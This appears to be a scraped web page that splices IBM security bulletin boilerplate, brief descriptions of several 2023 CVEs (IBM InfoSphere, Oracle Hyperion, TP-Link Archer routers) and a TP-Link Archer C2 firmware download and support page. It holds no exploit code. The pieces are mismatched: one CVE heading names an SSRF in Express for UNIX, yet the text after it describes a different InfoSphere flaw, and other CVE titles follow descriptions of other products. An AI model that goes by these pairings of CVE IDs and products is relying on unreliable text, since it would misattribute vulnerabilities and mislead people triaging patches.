According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS3JSW","label":"IBM Sterling B2B Integrator"},"Component":"Sterling Connect:Express Adapter for Sterling B2B Integrator","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF016","label":"Linux"},{"code":"PF027","label":"Solaris"},{"code":"PF033","label":"Windows"}\],"Version":"5.2","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}}\]

CVE-2023-29260: Express for UNIX is vulnerable to server-side request forgery (SSRF)

IBM InfoSphere Information Server 11.7 could allow an authenticated user to obtain sensitive information due to an insecure security configuration in InfoSphere Data Flow Designer.  IBM X-Force ID:  259352.

  

**Summary**

DataStage Flow Designer is an internal component of IBM InfoSphere Information Server. An information disclosure vulnerability in the DataStage Flow Designer was addressed.

**Vulnerability Details**

**CVEID:**   CVE-2023-35898  
**DESCRIPTION:**   IBM InfoSphere Information Server could allow an authenticated user to obtain sensitive information due to an insecure security configuration in InfoSphere Data Flow Designer.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/259352 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

InfoSphere Information Server

11.7

**Remediation/Fixes**

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

17 Jul 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSZJPZ","label":"IBM InfoSphere Information Server"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"},{"code":"PF002","label":"AIX"},{"code":"PF016","label":"Linux"}\],"Version":"11.7","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2023-35898: Security Bulletin: IBM InfoSphere Information Server is affected by an information disclosure vulnerability (CVE-2023-35898)

Vulnerability in the Oracle Hyperion Financial Reporting product of Oracle Hyperion (component: Repository).   The supported version that is affected is 11.2.13.0.000. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Hyperion Financial Reporting.  While the vulnerability is in Oracle Hyperion Financial Reporting, attacks may significantly impact additional products (scope change).  Successful attacks of this vulnerability can result in  unauthorized access to critical data or complete access to all Oracle Hyperion Financial Reporting accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Hyperion Financial Reporting. CVSS 3.1 Base Score 8.5 (Confidentiality and Availability impacts).  CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L).

CVE-2023-22062: Oracle Critical Patch Update Advisory - July 2023

TP-LINK Archer C50v2 Archer C50(US)_V2_160801, TP-LINK Archer C20v1 Archer_C20_V1_150707, and TP-LINK Archer C2v1 Archer_C2_US__V1_170228 were discovered to contain a buffer overflow which may lead to a Denial of Service (DoS) when parsing crafted data.

**Utility**

USB\_Printer\_Controller\_Utility\_Mac

Download

Published Date: 2022-02-21

Language: English

File Size: 1.75 MB

Operating System: Mac OS 10.15/11.x/12.x

USB\_Printer\_Controller\_Utility\_Mac

Download

Published Date: 2018-10-29

Language: English

File Size: 2.53 MB

Operating System: Mac OS 10.9-10.14

USB\_Printer\_Controller\_Utility\_Windows

Download

Published Date: 2016-11-18

Language: English

File Size: 9.62 MB

Operating System: WinXP/Vista/7/8/8.1/10

Archer C2\_V1\_Easy Setup Assistant\_140218

Download

Published Date: 2014-02-18

Language: English

File Size: 6.78 MB

Operating System: WinXP/Vista/7/8

**Setup Video**

*   **How to Resolve Double NAT using Starlink**
*   **How to Configure a TP-Link Router with Starlink**
*   **How to Set up Address Reservation on TP-Link Routers Windows**
    
    This video will show you how to set up Address Reservation on TP-Link routers.
    
    More Fold
    
*   **How to Set up OpenVPN on TP-Link Routers Windows**
    
    This video will show you how to set up OpenVPN on a TP-Link Wi-Fi router. For more information, visit www.tp-link.com/support.
    
    More Fold
    
*   **What should I do if I cannot access the internet? - Using a DSL modem and a TP-Link router**
    
    If you can’t access the internet using a DSL modem and TP-Link router, this video can help you solve the problem.
    
    More Fold
    
*   **What should I do if I cannot access the internet? - Using a cable modem and a TP-Link router**
    
    If you can’t access the internet using a cable modem and TP-Link router, follow this video step by step to solve your problem.
    
    More Fold
    
*   **How to turn a router into an Access Point?**
*   **How to set up Port Forwarding on a TP-Link router**
    
    Take Archer A7 as demonstration.
    
    More Fold
    
*   **How to set Parental Controls on a TP-Link router**
    
    Take Archer A9 as demonstration.
    
    More Fold
    
*   **How to change the Wi-Fi settings on TP-Link router**

**Firmware**

A firmware update can resolve issues that the previous firmware version may have and improve its current performance.

**To Upgrade**

**IMPORTANT:** To prevent upgrade failures, please read the following before proceeding with the upgrade process

*   **Please upgrade firmware from the local TP-Link official website of the purchase location for your TP-Link device, otherwise it will be against the warranty. Please click here to change site if necessary.**
*   Please verify the hardware version of your device for the firmware version. Wrong firmware upgrade may damage your device and void the warranty. (**Normally Vx.0=Vx.6/Vx.8 (eg:V1.0=V1.6/V1.8);   Vx.x0=Vx.x6/Vx.x8 (eg:V1.20=V1.26/V1.28)**  
    How to find the hardware version on a TP-Link device
*   **Do NOT turn off the power during the upgrade process, as it may cause permanent damage to the product.**
*   To avoid wireless disconnect issue during firmware upgrade process, it's recommended to upload firmware with wired connection unless there is no LAN/Ethernet port on your TP-Link device.
*   It's recommended that users stop all Internet applications on the computer, or simply disconnect Internet line from the device before the upgrade.
*   Use decompression software such as WinZIP or WinRAR to extract the file you download before the upgrade.

More Fold

Archer C2(US)\_V1\_170228

Download

Published Date: 2017-02-28

Language: English

File Size: 6.69 MB

Modifications and Bug Fixes:

New Features/Enhancement:  
Optimized the security mechanism.

Bug fixed:  
1\. Fixed the bug that some IPv6 websites can't be accessed in some special scenarios.  
2\. Fixed the bug that the device would be unable to access internet when special IP address and gateway are offered by ISP.

Notes:

1\. For Archer C2(US)\_V1.  
2\. It is NOT suggested to upgrade firmware which is not for your region. If this site is not for your region, please click here to choose your own region and download the most suitable firmware version.

Archer C2(US)\_V1\_160606

Download

Published Date: 2016-06-06

Language: English

File Size: 6.53 MB

Modifications and Bug Fixes:

New Features/Enhancement：  
1\. Added the function to filter the https website.  
2\. Improved the 2.4GHz wireless capability.  
3\. Enhanced the security mechanism.  
4\. Optimized the performance of IPv6 connection.

Bug Fixed：  
1\. Fixed the bug that the the delay is higher than normal when trying to Ping the LAN IP of the device.  
2\. Fixed the bug that the media server would display but fail to use the sharing files even you've already deleted the last folder.  
3\. Fixed the bug that some repeaters may fail to renew IP address normally with it.  
4\. Fixed the bug that PPPoE connection may fail to be connected in some special scenario.

Notes:

1\. For Archer C2(US)\_V1  
2\.  It is NOT suggested to upgrade firmware which is not for your region. If this site is not for your region, please click here to choose your own region and download the most suitable firmware version.

Archer C2(US)\_v1\_160128

Download

Published Date: 2016-01-28

Language: English

File Size: 6.57 MB

Modifications and Bug Fixes:

New Features/Enhancement：  
1\. Added the conflict detection function of DNS and LAN IP.  
2\. Enhance the performance for multicast.   
3\. The switch of DOS won't affect the Ping function of WAN and LAN any more.  
Bug Fixed：  
The LED light would keep flashing if the USB device is unplugged when scanning.

Notes:

1.For Archer C2(US)1.0  
2.If you’re in a region out of United States, please do not upgrade US firmware.Click here to choose your region for the most suitable firmware.

**To Use Third Party Firmware In TP-Link Products**

Some official firmware of TP-Link products can be replaced by the third party firmware such as DD-WRT. TP-Link is not obligated to provide any maintenance or support for it, and does not guarantee the performance and stability of third party firmware. Damage to the product as a result of using third party firmware will void the product's warranty.

**Open Source Code For Programmers (GPL)**

Please note: The products of TP-Link partly contain software code developed by third parties, including software code subject to the GNU General Public Licence (“GPL“), Version 1/Version 2/Version 3 or GNU Lesser General Public License ("LGPL"). You may use the respective software condition to following the GPL licence terms.

You can review, print and download the respective GPL licence terms here. You receive the GPL source codes of the respective software used in TP-Link products for direct download and further information, including a list of TP-Link software that contain GPL software code under GPL Code Center.

The respective programs are distributed WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the respective GNU General Public License for more details.

**Apps**

TP-Link Tether

TP-Link Tether provides the easiest way to access and manage your network with your iOS or Android devices. Learn more about TP-Link Tether and Compatible Devices

Note: To use Tether, please update your TP-Link device's firmware to the latest version.

**Emulators**

Firmware Version

Working Mode

Language

140218

\-

English

Browse

**Note:**

1\.  The emulator is a virtual web GUI where you can experience the TP-Link product management panel.

2\. The listed emulators might not have the latest firmware.

3\.  The features displayed are for reference, and their availability may depend on local regulations. For more information, please refer to the datasheet or product page.

Tag

#windows